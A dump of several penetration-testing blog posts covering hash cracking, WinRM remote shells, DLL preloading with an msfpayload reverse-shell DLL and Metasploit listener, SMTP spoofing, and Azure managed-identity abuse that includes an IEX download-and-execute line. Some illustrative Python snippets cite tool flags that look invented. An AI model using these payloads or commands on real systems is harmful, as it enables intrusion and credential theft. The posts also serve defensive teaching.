    "pass.json" = f72d3d597c7fc9d1f2132364609d32c9890de458;
    "strip.png" = b9f823da6eefc83127b68f0ccca552514803ed1f;
    "strip@2x.png" = 319991c69de365c0d2a8534e0997aea01f08d3eb;
    "thumbnail.png" = a68cc65e48febb6e603682d057d4e997da64a6a5;
    "thumbnail@2x.png" = 7ec0e3c38225fea3a5b0dbb36d7712c27b8b418f;
}

Sending passes via email or web

The easiest way to deploy your newly created pass is through email. A properly signed .pkpass file should show up in your iOS mailbox as a Passbook pass without any issue. Additionally, .pkpass files can be downloaded from a web server that has support for serving .pkpass files.


Conclusions

The primary risk that I see with intercepting Passbook files is fraud. Someone could potentially modify a pass to try and get a discount at a store, or maybe gain access to someone else’s rewards account. This can easily be stopped by using strong controls on the business’s side, but there’s always a risk of social engineering. For those developing Passbook integration for their applications, make sure all of your pass files are sent over securely encrypted channels and ensure that your business has strong controls to prevent tampering with Passbook passes. For those that would like a copy of the NetSPI pass shown above, email me karl.fosaaen@netspi.com. [post_title] => Hacking Passbook, the Real Way to do Extreme Couponing [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => hacking-passbook-the-real-way-to-do-extreme-couponing [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:24 [post_modified_gmt] => 2021-06-08 21:51:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1180 [menu_order] => 772 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [71] => WP_Post Object ( [ID] => 1184 [post_author] => 10 [post_date] => 2012-11-09 07:00:09 [post_date_gmt] => 2012-11-09 07:00:09 [post_content] => Frequently during penetration tests, we will capture halflmchall password hashes from the network. These can come from a variety of sources, but common sources include NBNS spoofing and SQL queries/SQL injection. Both methods can be easy ways to get halflmchall hashes during a pen test. For those who are unfamiliar with halflmchall hashes and how they are created, the process is pretty simple. When a client makes an authentication request with a server, the server responds with a challenge (which is basically a seed value used for hashing) for the client to use. 
If we are acting as the server, we can specify the challenge and the authentication protocol that we want to use. If we have a static challenge (1122334455667788) and a weak authentication protocol (LANMAN v1), we’re able to quickly look up the captured hashes in rainbow tables. Now, this isn’t the full technical detail of the process, but hopefully this gives you a good idea as to how this can work to our advantage. For a much more in-depth review of the process, here’s a great write-up: https://www.foofus.net/?page_id=63. The typical capture-to-cracked-password process goes like this:
  1. Obtain a man-in-the-middle position, or force a server to authenticate to your evil server.
  2. Capture the hash (via SMB or HTTP servers).
  3. Look up the first 16 characters of the captured LM hash in the HalfLMChall rainbow tables.
  4. Use the cracked portion of the LM hash to feed into the John the Ripper netntlm.pl script to crack the rest of the LM hash.
  5. Feed the case insensitive password (from step 3) back into the netntlm.pl script to crack the case sensitive NTLM hash and get the full password.
The cracking process goes pretty quickly, but it does require running multiple commands and some copy-and-paste work. I’ve found that this process takes up more of my time than I would like, so I wrote a PowerShell script to automate the whole cracking process.
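For reference, the chaining logic itself is simple; here is a rough Python sketch of the same idea (the tool paths and flags are placeholders for illustration — the actual script is PowerShell and uses its own parameters):

```python
import subprocess

# Placeholder paths; point these at your own installs.
RCRACK = "/opt/rcracki_mt/rcracki_mt"
TABLES = "/opt/tables/halflmchall"
NETNTLM = "/opt/john/run/netntlm.pl"

def build_pipeline(hash_file):
    # Step 3: look up the first LM block in the rainbow tables, then
    # steps 4-5: feed the result through netntlm.pl twice (the second
    # pass seeds the case-insensitive password to crack the NTLM hash).
    return [
        [RCRACK, TABLES, "-f", hash_file],
        ["perl", NETNTLM, "--file", hash_file],
        ["perl", NETNTLM, "--file", hash_file, "--seed", "CRACKED"],
    ]

def run_pipeline(hash_file):
    for cmd in build_pipeline(hash_file):
        subprocess.run(cmd, check=True)
```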

PowerShell cracking script requirements:

  1. The halflmchall rainbow tables
  2. Rcracki_mt
  3. John the Ripper (Jumbo release)
  4. Perl (required to run netntlm.pl)
  5. You will also need to enable PowerShell to run scripts: “Set-ExecutionPolicy RemoteSigned”
Within the script you will have to specify your John, rcrack, Perl, and rainbow table locations, but you should be able to run the script from any directory. The script usage is simple:
PS_MultiCrack.ps1 Input_File Output_File
You should be able to use the john formatted output file generated from the metasploit modules, but below is the basic format that the script will require:
Domain\User:::LMHASH:NTLMHASH:1122334455667788
Example\TestAdmin:::daf4ce8f1965961138e76ee328e595e0c0c2d9a83fbe83fb:211af68207f7c88a1ad6c103a56966d1da1c1e91f02291f0:1122334455667788
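As a quick illustration of the input format, this Python sketch (my own helper, not part of the script) pulls out the fields and the 16-character rainbow table lookup value:

```python
def parse_halflm(line):
    # Format: DOMAIN\User:::LMHASH:NTLMHASH:CHALLENGE
    parts = line.strip().split(":")
    return {
        "user": parts[0],
        "lmhash": parts[3],
        "ntlmhash": parts[4],
        "challenge": parts[5],
        # Only the first 16 hex chars (one DES block of the LM
        # response) get looked up in the halflmchall tables.
        "lm_lookup": parts[3][:16],
    }

sample = ("Example\\TestAdmin:::daf4ce8f1965961138e76ee328e595e0c0c2d9a83fbe83fb"
          ":211af68207f7c88a1ad6c103a56966d1da1c1e91f02291f0:1122334455667788")
print(parse_halflm(sample)["lm_lookup"])  # daf4ce8f19659611
```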
The “1122334455667788” is the default static challenge that is used by most of the tools used for capturing the hashes. It’s also the challenge used by the rainbow tables (Download here). The script will write out each username and password to the output file when it’s done. Hashes that are already in the john.pot file will be prefixed in your output file as “Previously Cracked:” so that you don’t have to worry about cleaning out your input file as you add more hashes. Additionally, the script won’t go through the effort of cracking the same hash again, as that would be a waste of time. If you have any comments, suggestions, or issues, please let me know through here or GitHub and I’ll try to address them. GitHub Repo [post_title] => Automating HalfLMChall Hash Cracking [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => automating-halflmchall-hash-cracking [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:35 [post_modified_gmt] => 2021-04-13 00:05:35 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1184 [menu_order] => 775 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [72] => WP_Post Object ( [ID] => 1186 [post_author] => 10 [post_date] => 2012-10-29 07:00:09 [post_date_gmt] => 2012-10-29 07:00:09 [post_content] =>

Introduction - What is WinRM?

Windows Remote Management (WinRM) is a SOAP-based protocol that can be used to remotely administer machines over the network. It’s a handy tool for network admins and can also be used to automate tasks securely across multiple machines. However, it is fairly easy to misconfigure the service and/or abuse it with legitimate account access.

How to mess up the WinRM configuration

In my personal experience with configuring the WinRM service, I have found it hard to get anything working correctly without completely removing security controls from the configuration. Scale my frustrations up to a domain level and you very quickly have poorly secured configs going out to hosts across a domain. It should be noted that the following commands should not be used for an actual WinRM configuration. These are just examples of the multiple ways that this service can be configured to run insecurely. Quick steps for configuring WinRM insecurely (note: these are all commands that are run from a command shell with administrative privileges):
  1. Start the WinRM service. The only requirement to start the service is that none of your network interfaces can be set to “Public” in Windows. This typically isn’t an issue in domain environments. The command itself is not really a security issue, it’s just needed to actually run the WinRM service.
     winrm quickconfig
  2. Allow WinRM commands to be accepted through unencrypted channels (HTTP).
     winrm set winrm/config/service @{AllowUnencrypted="true"}
  3. Allow WinRM commands to be sent through unencrypted channels (HTTP).
     winrm set winrm/config/client @{AllowUnencrypted="true"}
  4. Enable “Basic” network authentication for inbound WinRM connections to the server.
     winrm set winrm/config/service/auth @{Basic="true"}
  5. Enable “Basic” network authentication for outbound WinRM client connections. So, when you make a WinRM connection to another host with the local WinRM client, you can authenticate using “Basic” authentication.
     winrm set winrm/config/client/auth @{Basic="true"}
  6. Allow credentials to be relayed out to another host using the CredSSP protocol. This allows the host receiving commands to pass incoming credentials on to another host for authentication.
     winrm set winrm/config/service/auth @{CredSSP="true"}
In order to authenticate against the service remotely, the authenticating account either has to be the same as the service account running the WinRM service, or a member of the local administrators group. This also means that any service set up to run scripted jobs through WinRM has to have access to credentials for a local administrator account.

What can we do with this?

Let’s assume that you have access to a host on a network and you have domain credentials, but there are no escalation points for you to follow on the host. If the WinRM service is set up to listen on other hosts in the domain, you may have the ability to use the service to gain remote access to those hosts. Let’s say that you want to gain remote access to host 192.168.0.123 on the domain, but RDP is not enabled (or your account does not have RDP access). Open TCP ports 5985 and 5986 indicate that the WinRM service may be running on the remote host. You can identify the service with the following command:

winrm identify -r:http://192.168.0.123:5985 -auth:none

The response should look something like this:

IdentifyResponse
    ProtocolVersion = http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd
    ProductVendor = Microsoft Corporation
    ProductVersion = OS: 6.1.7601 SP: 1.0 Stack: 2.0

Once you’ve determined the service is running, you can try to run commands against the remote host with the Windows Remote Shell (winrs) command:

winrs -r:http://192.168.0.123:5985 -u:domainname\useraccount "dir c:\"

You can also use this with HTTPS on port 5986, as that may be your only option. If you change the “dir c:\” to “cmd”, you will have a remote shell on the host. That should look something like this:

winrs -r:http://192.168.0.123:5985 -u:domainname\useraccount "cmd"

While the remote shell will only be running under your account’s privileges, there may be other escalation options on your new host.
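The port check described earlier can be sketched in a few lines of Python (a plain TCP connect probe — a successful connection suggests, but doesn’t prove, that WinRM is listening):

```python
import socket

WINRM_PORTS = (5985, 5986)  # HTTP and HTTPS listeners

def port_open(host, port, timeout=2.0):
    # Plain TCP connect probe; connect_ex returns 0 on success.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0

def probe_winrm(host):
    # Map each WinRM port to whether it accepted a connection.
    return {port: port_open(host, port) for port in WINRM_PORTS}
```

If either port accepts a connection, follow up with the winrm identify command above to confirm the service.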

Conclusion

As you can see, the WinRM service can be very powerful and useful for legitimately administering systems on the domain. It also can be used by attackers to work their way through the internal network. With any network service, determine your business need for the service before it is implemented. If the service is needed, then ensure that the service is securely configured before it is deployed. If you’re thinking about using WinRM, make sure that you only allow specific trusted hosts and limit users in your local administrators groups. [post_title] => Exploiting Trusted Hosts in WinRM [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => exploiting-trusted-hosts-in-winrm [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:18 [post_modified_gmt] => 2021-04-13 00:05:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1186 [menu_order] => 777 [post_type] => post [post_mime_type] => [comment_count] => 5 [filter] => raw ) [73] => WP_Post Object ( [ID] => 1187 [post_author] => 10 [post_date] => 2012-10-22 07:00:09 [post_date_gmt] => 2012-10-22 07:00:09 [post_content] => DLL preloading (also known as sideloading and/or hijacking) is a common vulnerability in applications. The exploitation of the vulnerability is a simple file write (or overwrite) and then you have an executable running under the context of the application. The vulnerability is fairly easy to identify and even easier to exploit. In this blog, I will be showing you how identify and exploit DLL preloading vulnerabilities, as well as give you tips on how you can protect yourself from these vulnerabilities.

What is it?

DLL preloading happens when an application looks to call a DLL for execution and an attacker provides a malicious DLL to use instead. If the application is not properly configured, the application will follow a specific search path to locate the DLL. The application initially looks at its current directory (the one where the executable is located) for the DLL. If the DLL is not found in this location, the application will then continue on to the current working directory. This can be very helpful if the malicious DLL can be loaded along with a file, as the file and DLL can be accessed by multiple people on a network share. From there it’s on to the system directory, followed by the Windows directory, finally looking in the PATH environmental variable for the DLL. Properly configured applications will require specific paths and/or proper signatures for DLLs in order to use them. If an attacker has write access to the DLL or a location earlier within the search path, they can potentially cause the application to preload their malicious DLL.
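The search order described above can be modeled in a few lines of Python (a simplified model of the legacy search order for illustration; it ignores SafeDllSearchMode and KnownDLLs):

```python
import os

def dll_search_order(exe_dir):
    # Simplified legacy DLL search order, as described above. Any
    # attacker-writable directory that appears before the DLL's real
    # location can be used to plant a malicious copy.
    system_root = os.environ.get("SystemRoot", r"C:\Windows")
    return [
        exe_dir,                                # application directory
        os.getcwd(),                            # current working directory
        os.path.join(system_root, "System32"),  # system directory
        system_root,                            # Windows directory
    ] + os.environ.get("PATH", "").split(os.pathsep)
```

Note how early the current working directory sits in the list — that is what makes the network-share scenario (a malicious DLL next to an opened file) so effective.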

How to identify vulnerable DLLs

Personally, I like to use Dependency Walker for static analysis on all of the DLLs that are called by the application. Note that Dependency Walker will not catch DLLs that are compiled into the application. For a more dynamic approach, you can use ProcMon. ProcMon can be used to identify vulnerable applications by identifying DLLs called during runtime. Using ProcMon with the Net Stumbler program, we can see that the application makes multiple calls to the MFC71ENU.DLL file. We identify vulnerable DLLs by the locations that they are called from. If the location is controlled by an attacker, the application is potentially vulnerable. Here we can see that NetStumbler (version 0.4.0) is looking for the mfc71enu.dll file in a number of different directories, including the tools directory from which I opened a .ns1 NetStumbler file. This is not a guarantee that the application is vulnerable. The application may use some secondary measures (integrity checks) to prevent DLL tampering, but this is at least a good start for trying to attack the application.

How to exploit it

Once a vulnerable DLL is identified, the attack is fairly simple.
  1. Craft your malicious DLL with Metasploit
    1. msfpayload PAYLOAD LHOST=192.168.0.101 LPORT=8443 D > malicious_DLL.dll
      1. PAYLOAD, LHOST, and LPORT are up to you
      2. D denotes that you are creating a DLL payload
    2. Place the replacement DLL in the vulnerable directory and rename it to the name of the vulnerable DLL.
    3. Set up your listener
      1. Run the Metasploit console
      2. msf > use exploit/multi/handler
      3. msf exploit(handler) > set LHOST 127.0.0.1
      4. msf exploit(handler) > set LPORT 8443
      5. msf exploit(handler) > exploit –j
        1. This will start the listener as a job, allowing you to handle multiple sessions.
    4. Run the application (or open your file with the DLL in the same folder). Once the application makes the call to the vulnerable DLL, the Meterpreter payload will execute. If this is done on a network share, this could have a much greater impact.
    5. The Metasploit sessions -l command will list the active sessions, and sessions -i (SessionNumber) will let you interact with a session.
For this version of Net Stumbler (0.4.0), the application is vulnerable through the mfc71enu.dll file. Below is an example of a malicious DLL placed in the directory of a Net Stumbler file. When the TestStuble.ns1 file is opened, the application will use the malicious DLL located in the current directory and create a Meterpreter session.

How to fix it or prevent it

DLL preloading can be a helpful attack during a penetration test, but it doesn’t have to be a pain to fix. For application developers:
  • Require set paths for DLLs in applications
For system administrators:
  • Disable write permissions to relative application folders
  • Utilize least privilege access to prevent users (and applications) from having too much access to the system
For both groups:

Conclusion

As you can see, DLL preloading is still a common issue with applications. Hopefully this blog can help give you some insight on how the attack works and what you can do to lock down your applications to prevent this issue. If you want some examples of vulnerable applications, ExploitDB has a great list. [post_title] => Testing Applications for DLL Preloading Vulnerabilities [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => testing-applications-for-dll-preloading-vulnerabilities [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:23 [post_modified_gmt] => 2021-06-08 21:51:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1187 [menu_order] => 778 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [74] => WP_Post Object ( [ID] => 1190 [post_author] => 10 [post_date] => 2012-10-09 07:00:09 [post_date_gmt] => 2012-10-09 07:00:09 [post_content] => Recently Adam Caudill and ElcomSoft identified vulnerabilities in the way that UPEK fingerprint readers store Windows passwords in the registry. Adam has released a great proof-of-concept tool to decrypt these poorly encrypted passwords. I have access to a Lenovo T420 ThinkPad that features a UPEK fingerprint reader. The ThinkVantage Fingerprint Software is also vulnerable to this UPEK issue. The issue with the ThinkPad software affects credentials that are entered by the user in the ThinkVantage Fingerprint Software. Since I do not use the fingerprint reader for Active Directory authentication, I do not regularly update my password in the software. So when I initially ran the decryption tool, the tool came back with my password from several months ago. For users who regularily use the fingerprint reader for AD authentication, this could be a major issue. If you have this software on your machine and want to keep it on your machine, I would recommend the following:
  1. Set a disposable password for your Windows account
  2. Open up the “ThinkVantage Fingerprint Software” (Accessible from the ThinkVantage Client Security Solution menu)
  3. Enter your disposable password in the software and click “Submit”.
  4. Close out the software and only authenticate to the application with your fingerprint.
  5. Once your password has been updated, it may be worth compiling Adam Caudill’s tool to double check that the password has been changed: https://github.com/brandonlw/upek-ps-pass-decrypt
  6. Additionally, you can use the reveal password button to show the current password stored by the application.
  7. Finally, full disk encryption is a good idea, regardless of your use of a fingerprint reader. If someone steals your computer, full disk encryption will prevent them from recovering data (including registry keys) from the hard drive.
[post_title] => UPEK + Lenovo = Insecure Password Storage [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => upek-lenovo-insecure-password-storage [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:20 [post_modified_gmt] => 2021-06-08 21:51:20 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1190 [menu_order] => 781 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [75] => WP_Post Object ( [ID] => 1207 [post_author] => 10 [post_date] => 2012-05-24 07:00:09 [post_date_gmt] => 2012-05-24 07:00:09 [post_content] => In November of 2010, Facebook introduced their “@facebook.com” messaging option that gave users the opportunity to create their own facebook.com email address. Currently, all Facebook users have the ability to claim their own facebook.com email address. It’s easily accessible from the “messages” page, if your account has not already been set up for it. While the service is a nice way of communicating with non-Facebook friends via email and the Facebook message dashboard, there are some security issues that open up along with the service. Facebook accepts incoming email messages for delivery from their MX Record - smtpin.mx.facebook.com (66.220.155.14). These messages are currently being accepted for delivery based on their source IP address and whether or not the address is associated with a PTR record. This is supposed to prevent spoofing, but the mail server only checks the IP for a valid PTR record for that IP, and not if the domain of the sender’s email address matches the IP of the mail server. To fix this, Facebook needs to ensure that a message coming from a gmail.com address is originating from a Gmail mail server. Messages from non-PTR record IP addresses are stopped by the Facebook mail server. SMTP connection attempt from an IP without a PTR record:
$ telnet 66.220.155.14 25 Trying 66.220.155.14...
Connected to smtpin.mx.facebook.com (66.220.155.14).
Escape character is '^]'. 
554 5.1.8 DNS-P3 https://postmaster.facebook.com/response_codes? #dns-p No PTR Record
Connection closed by foreign host.
The Facebook mail server does, however, allow incoming messages from IPs with a PTR record, which allows us to spoof messages from other users. If you are behind an IP address with a PTR record, you can spoof a message from an external domain to a facebook.com email address. Currently, Facebook is properly blocking incoming messages spoofing a facebook.com domain. If Facebook gets breached, and their semi-private @facebook.com email addresses are leaked publicly, someone could easily start spoofing messages between users to propagate spam, phishing attacks, and/or malware. Right now, it’s not very hard to guess someone’s Facebook email address based off of their Facebook username, so Facebook needs to implement a filter that ensures the IP address from which a message originates matches the IP address of the MX record for the domain the message claims to come from. This will prove the sender of the message is on the same domain as the address they are claiming to represent. This does not outright remove the risk of spoofing between users, but it’s a good start. Currently, Facebook does some notification on suspicious messages. This equates to a small yellow triangle in the right-hand corner of the message. It’s not very obvious and could easily be interpreted as “important” or “urgent.” The above message was sent from my spoofed Gmail address to my @facebook.com address. It should be noted that Facebook is not the only site that falls victim to SMTP spoofing issues. Many of the social networking sites that allow users to accept emails as messages may be vulnerable to the same issues. 
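The PTR-only check can be sketched as follows (Python, with the resolver injected so the logic can be exercised without network access; this is an illustration of the check, not Facebook’s actual code):

```python
import socket

def has_valid_ptr(ip, resolver=socket.gethostbyaddr):
    # The weak check: does the connecting IP reverse-resolve at all?
    # Note this proves nothing about whether the PTR hostname matches
    # the domain in the message's From address, which is the gap that
    # makes spoofing possible.
    try:
        hostname, _, _ = resolver(ip)
        return bool(hostname)
    except (socket.herror, OSError):
        return False
```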
[post_title] => Facebook message spoofing via SMTP [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => facebook-message-spoofing-via-smtp [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:18 [post_modified_gmt] => 2021-06-08 21:51:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1207 [menu_order] => 799 [post_type] => post [post_mime_type] => [comment_count] => 12 [filter] => raw ) ) [post_count] => 76 [current_post] => -1 [before_loop] => 1 [in_the_loop] => [post] => WP_Post Object ( [ID] => 32110 [post_author] => 10 [post_date] => 2024-03-14 08:00:00 [post_date_gmt] => 2024-03-14 13:00:00 [post_content] =>

As Azure penetration testers, we often run into overly permissioned User-Assigned Managed Identities. This type of Managed Identity is a subscription-level resource that can be applied to multiple other Azure resources. Once applied to another resource, it allows the resource to use the associated Entra ID identity to authenticate and gain access to other Azure resources. These are typically used in cases where Azure engineers want to easily share specific permissions with multiple Azure resources. An attacker with the correct permissions in a subscription can assign these identities to resources that they control and gain access to the identity’s permissions. 

When we attempt to escalate our permissions with an available User-Assigned Managed Identity, we can typically choose from one of the following services to attach the identity to:

Once we attach the identity to the resource, we can then use that service to generate a token (to use with Microsoft APIs) or take actions as that identity within the service. We’ve linked out on the above list to some blogs that show how to use those services to attack Managed Identities. 

The last item on that list (Deployment Scripts) is a more recent addition (2023). After taking a look at Rogier Dijkman’s post - “Project Miaow (Privilege Escalation from an ARM template)” – we started making more use of the Deployment Scripts as a method for “borrowing” User-Assigned Managed Identities. We will use this post to expand on Rogier’s blog and show a new MicroBurst function that automates this attack.

TL;DR 

  • Attackers may get access to a role that allows assigning a Managed Identity to a resource 
  • Deployment Scripts allow attackers to attach a User-Assigned Managed Identity 
  • The Managed Identity can be used (via Az PowerShell or AZ CLI) to take actions in the Deployment Scripts container 
  • Depending on the permissions of the Managed Identity, this can be used for privilege escalation 
  • We wrote a tool to automate this process 

What are Deployment Scripts? 

As an alternative to running local scripts for configuring deployed Azure resources, the Azure Deployment Scripts service allows users to run code in a containerized Azure environment. The containers themselves are created as “Container Instances” resources in the Subscription and are linked to the Deployment Script resources. There is also a supporting “*azscripts” Storage Account that gets created for the storage of the Deployment Script file resources. This service can be a convenient way to create more complex resource deployments in a subscription, while keeping everything contained in one ARM template.

In Rogier’s blog, he shows how an attacker with minimal permissions can abuse their Deployment Script permissions to attach a Managed Identity (with the Owner Role) and promote their own user to Owner. During an Azure penetration test, we don’t often need to follow that exact scenario. In many cases, we just need to get a token for the Managed Identity to temporarily use with the various Microsoft APIs.
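For reference, fetching a token from inside an attached compute resource generally follows the standard managed identity pattern; below is a hedged Python sketch against the IMDS-style endpoint (the exact endpoint and headers inside a Deployment Script container may differ — Connect-AzAccount -Identity handles this for you in Az PowerShell):

```python
import json
import urllib.parse
import urllib.request

IMDS = "http://169.254.169.254/metadata/identity/oauth2/token"

def build_token_request(resource, client_id=None):
    # Standard Azure IMDS token request; client_id selects a specific
    # user-assigned identity when more than one is attached.
    params = {"api-version": "2018-02-01", "resource": resource}
    if client_id:
        params["client_id"] = client_id
    url = IMDS + "?" + urllib.parse.urlencode(params)
    return urllib.request.Request(url, headers={"Metadata": "true"})

def get_token(resource, client_id=None):
    # Only works from inside an Azure resource with the identity attached.
    with urllib.request.urlopen(build_token_request(resource, client_id)) as r:
        return json.load(r)["access_token"]
```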

Automating the Process

In situations where we have escalated to some level of “write” permissions in Azure, we usually want to do a review of available Managed Identities that we can use, and the roles attached to those identities. This process technically applies to both System-Assigned and User-Assigned Managed Identities, but we will be focusing on User-Assigned for this post.

This is a pretty simple process for User-Assigned Managed Identities. We can use the following one-liner to enumerate all of the roles applied to a User-Assigned Managed Identity in a subscription:

Get-AzUserAssignedIdentity | ForEach-Object { Get-AzRoleAssignment -ObjectId $_.PrincipalId }

Keep in mind that the Get-AzRoleAssignment call listed above will only return the role assignments that your authenticated user can read. The Invoke-AzUADeploymentScript function will attempt to enumerate all available roles assigned to the identities that you have access to, but the identity may still have roles in Subscriptions (or Management Groups) that you don’t have read permissions on, and those will not show up in the results.
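As a slightly expanded sketch of the one-liner above, the following (assuming the Az.ManagedServiceIdentity and Az.Resources modules and an authenticated session) flattens the results into one table, which makes it easier to spot an over-permissioned identity:

```powershell
# Requires Connect-AzAccount plus the Az.ManagedServiceIdentity
# and Az.Resources modules.
Get-AzUserAssignedIdentity | ForEach-Object {
    $identity = $_
    # List every role assignment readable by the current user
    Get-AzRoleAssignment -ObjectId $identity.PrincipalId | ForEach-Object {
        [PSCustomObject]@{
            Identity = $identity.Name
            Role     = $_.RoleDefinitionName
            Scope    = $_.Scope
        }
    }
} | Sort-Object Identity | Format-Table -AutoSize
```

Sorting by identity groups the assignments together, so identities with broad roles (Owner, Contributor, User Access Administrator) stand out quickly.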

Once we have an identity to target, we can assign it to a resource (a Deployment Script) and generate tokens for the identity. Below is an overview of how we automate this process in the Invoke-AzUADeploymentScript function:

  • Enumerate available User-Assigned Managed Identities and their role assignments
  • Select the identity to target
  • Generate the malicious Deployment Script ARM template
  • Create a randomly named Deployment Script with the template
  • Get the output from the Deployment Script
  • Remove the Deployment Script and Resource Group Deployment
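At a high level, the deploy/collect/clean-up portion of that workflow can be sketched with standard Az cmdlets. This is only an illustration under assumed names ("ExampleRG", "exampleDeploymentScript", a local template file); the actual MicroBurst function generates the template and handles the details internally:

```powershell
# Hypothetical sketch of the deploy/collect/clean-up loop.
$deploymentName = "deploy-" + ([System.Guid]::NewGuid().ToString().Substring(0, 8))

# 1. Deploy the malicious Deployment Script ARM template
New-AzResourceGroupDeployment -Name $deploymentName -ResourceGroupName "ExampleRG" `
    -TemplateFile ".\DeploymentScript.json"

# 2. Read the script output (tokens or command output) from the script logs
Get-AzDeploymentScriptLog -Name "exampleDeploymentScript" -ResourceGroupName "ExampleRG"

# 3. Clean up the Deployment Script resource and the deployment itself
Remove-AzDeploymentScript -Name "exampleDeploymentScript" -ResourceGroupName "ExampleRG"
Remove-AzResourceGroupDeployment -Name $deploymentName -ResourceGroupName "ExampleRG"
```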

Since there is no easy way to determine whether your current user can create a Deployment Script in a given Resource Group, the script assumes that you have Contributor (write permissions) on the Resource Group containing the User-Assigned Managed Identity, and will use that Resource Group for the Deployment Script.

If you want to deploy your Deployment Script to a different Resource Group in the same Subscription, you can use the “-ResourceGroup” parameter. If you want to deploy your Deployment Script to a different Subscription in the same Tenant, use the “-DeploymentSubscriptionID” parameter and the “-ResourceGroup” parameter.

Finally, you can specify the scope of the tokens being generated by the function with the “-TokenScope” parameter.

Example Usage:

We have three different use cases for the function:

  1. Deploy to the Resource Group containing the target User-Assigned Managed Identity
Invoke-AzUADeploymentScript -Verbose
  2. Deploy to a different Resource Group in the same Subscription
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "ExampleRG"
  3. Deploy to a Resource Group in a different Subscription in the same tenant
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "OtherExampleRG" -DeploymentSubscriptionID "00000000-0000-0000-0000-000000000000"

*Where “00000000-0000-0000-0000-000000000000” is the Subscription ID that you want to deploy to, and “OtherExampleRG” is the Resource Group in that Subscription.

Additional Use Cases

Outside of the default action of generating temporary Managed Identity tokens, the function allows you to use the container environment to take actions as the Managed Identity from a (generally) trusted space. You can run specific commands as the Managed Identity using the “-Command” flag on the function. This is nice for obfuscating the source of your actions, as the usage of the Managed Identity will track back to the Deployment Script, versus using generated tokens away from the container.

Below are a couple of potential use cases and commands to use:

  • Run commands on VMs
  • Create RBAC Role Assignments
  • Dump Key Vaults, Storage Account Keys, etc.

Since the function expects string data as the output from the Deployment Script, make sure that the command you pass via the “-Command” parameter formats its output as a string, so that your command output is returned.

Example:

Invoke-AzUADeploymentScript -Verbose -Command "Get-AzResource | ConvertTo-Json"

Lastly, if you’re running any particularly complex commands, you may be better off loading your PowerShell code from an external source in the “-Command” parameter. The Invoke-Expression (IEX) cmdlet in PowerShell is a handy way to do this.

Example:

IEX (New-Object System.Net.WebClient).DownloadString('https://example.com/DeploymentExec.ps1') | Out-String

Indicators of Compromise (IoCs)

We’ve included the primary IoCs that defenders can use to identify these attacks. These are listed in the expected chronological order for the attack.

Operation Name | Description
--- | ---
Microsoft.Resources/deployments/validate/action | Validate Deployment
Microsoft.Resources/deployments/write | Create Deployment
Microsoft.Resources/deploymentScripts/write | Write Deployment Script
Microsoft.Storage/storageAccounts/write | Create/Update Storage Account
Microsoft.Storage/storageAccounts/listKeys/action | List Storage Account Keys
Microsoft.ContainerInstance/containerGroups/write | Create/Update Container Group
Microsoft.Resources/deploymentScripts/delete | Delete Deployment Script
Microsoft.Resources/deployments/delete | Delete Deployment
It’s important to note the final “delete” items on the list, as the function does clean up after itself and should not leave behind any resources.

Conclusion

While Deployment Scripts and User-Assigned Managed Identities are convenient for deploying resources in Azure, administrators of an Azure subscription need to keep a close eye on the permissions granted to users and Managed Identities. A slightly over-permissioned user with access to a significantly over-permissioned Managed Identity is a recipe for a fast privilege escalation.

References:

  • Rogier Dijkman – “Project Miaow (Privilege Escalation from an ARM template)”
Azure Deployment Scripts: Assuming User-Assigned Managed Identities (published on the NetSPI blog; last modified March 14, 2024)